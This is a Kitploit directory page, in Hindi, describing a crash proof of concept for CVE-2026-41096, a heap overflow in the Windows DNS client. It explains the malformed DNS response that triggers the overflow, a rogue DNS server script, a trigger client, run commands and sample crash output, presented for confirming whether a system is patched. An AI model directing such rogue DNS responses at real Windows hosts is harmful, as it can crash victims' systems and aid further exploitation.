Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41096 — CVE-2026-41096: Heap Overflow in the Windows DNS Client | Kitploit
उपकरण/GitHubGitHub/m0n1x90/cve-2026-41096
Payload GenerationVulnerability AnalysisExploitationFuzzingDNS AnalysisBinary Exploitation
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

CVE-2026-41096: Heap Overflow in the Windows DNS Client

रिपॉजिटरी देखें
322 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41096 - क्रैश PoC

DnsRawTruncateMessageForUdp() (dnsapi.dll) में हीप ओवरफ़्लो। एक निर्मित DNS प्रतिक्रिया जिसमें QDCOUNT=0 और एक बड़ा OPT रिकॉर्ड है, जब ट्रंकेशन तर्क गंतव्य पॉइंटर की गलत गणना करता है तो 604-बाइट का हीप ओवरफ़्लो होता है।

MSRC सलाह: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

घटक

फ़ाइलविवरण
rogue_dns_server.pyरोग DNS सर्वर (Python 3). हर क्वेरी का QDCOUNT=0 + OPT प्रतिक्रिया (623 बाइट्स) के साथ उत्तर देता है।
trigger_client.cट्रिगर क्लाइंट (C/Win32). रोग सर्वर की ओर इंगित DnsQueryRaw को कॉल करता है। SetUnhandledExceptionFilter के माध्यम से क्रैश को पकड़ता है।

आवश्यकताएँ

हमलावर (रोग सर्वर):

  • Python 3
  • रूट/एडमिन (पोर्ट 53)

पीड़ित (ट्रिगर क्लाइंट):

  • विंडोज OS जिसमें DnsCache सेवा है (DnsQueryRaw आवश्यक)
  • dnsapi.dll का कमजोर संस्करण
  • विज़ुअल स्टूडियो / विंडोज SDK (बनाने के लिए)

उपयोग

1. रोग सर्वर शुरू करें:

root@kitploit:~
sudo python3 rogue_dns_server.py

2. ट्रिगर क्लाइंट बनाएँ और चलाएँ:

root@kitploit:~
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (वैकल्पिक) निर्धारित क्रैश के लिए पेज हीप सक्षम करें:

root@kitploit:~
gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

निकास कोड

कोडअर्थ
0सिस्टम पैच किया गया है (DNS_ERROR_BAD_PACKET साफ-साफ लौटाया गया)
1त्रुटि (DnsQueryRaw नहीं मिला, नेटवर्क समस्या, आदि)
2क्रैश का पता चला (हीप ओवरफ़्लो की पुष्टि हुई)

उदाहरण आउटपुट

कमजोर (पेज हीप):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

कमजोर (कोई पेज हीप नहीं):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

पैच किया गया:

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
टूल डाउनलोड करें